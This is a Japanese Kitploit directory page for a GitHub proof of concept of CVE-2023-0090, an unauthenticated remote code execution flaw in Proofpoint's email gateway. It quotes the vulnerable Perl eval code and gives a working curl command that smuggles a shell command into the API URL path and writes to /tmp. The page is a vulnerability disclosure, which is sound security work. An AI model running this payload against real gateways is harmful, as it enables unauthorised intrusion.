Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/ly1g3/proofpoint-cve-2023-0090
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubly1g3/proofpoint-cve-2023-0090

proofpoint-CVE-2023-0090

Proofpoint Email Gateway: 未認証のRCE

リポジトリを見る
112ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

概要

セキュリティ研究者: ly1g3, ly1g3[at]tuta.io

GPGフィンガープリント: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

概要: リモートコード実行 - 未認証RCE

CVE: CVE-2023-0090

タイムライン:

  • 発見 - ly1g3
  • 報告 - ly1g3
  • 修正 - Proofpoint

Proofpoint Messaging Security Gateway 8.18.4.73-8.18.4.73

Proofpoint Messaging Security Gateway 向けエクスプロイト

リモートコード実行 (RCE)

WebServices API にアクセスできると、未認証のまま管理者権限で RCE を達成できます。

技術詳細

Webservices.pm はユーザー入力をサニタイズまたはチェックしません。この関数に到達するのに認証は不要ですが、RCE を行うには設定で API アクセスが有効になっている必要があります。$module はユーザーデータから直接取得され、評価されます。

root@kitploit:~

my $module = (split(/\//,$uri))[1];
$module = SERVICE_MODULE_PREFIX() . "::\u$module";

...


eval("require $module");

POC

/tmp/ に abc というファイルを作成します。コードは pps ユーザーとして実行されます。

root@kitploit:~
curl -k -vv "https://192.168.80.80:10010/ws/abc%2bsystem(%60id%20>%20\\\$\{SHELL:0:1\}tmp\\\$\{SHELL:0:1\}abc%60)"
ツールをダウンロード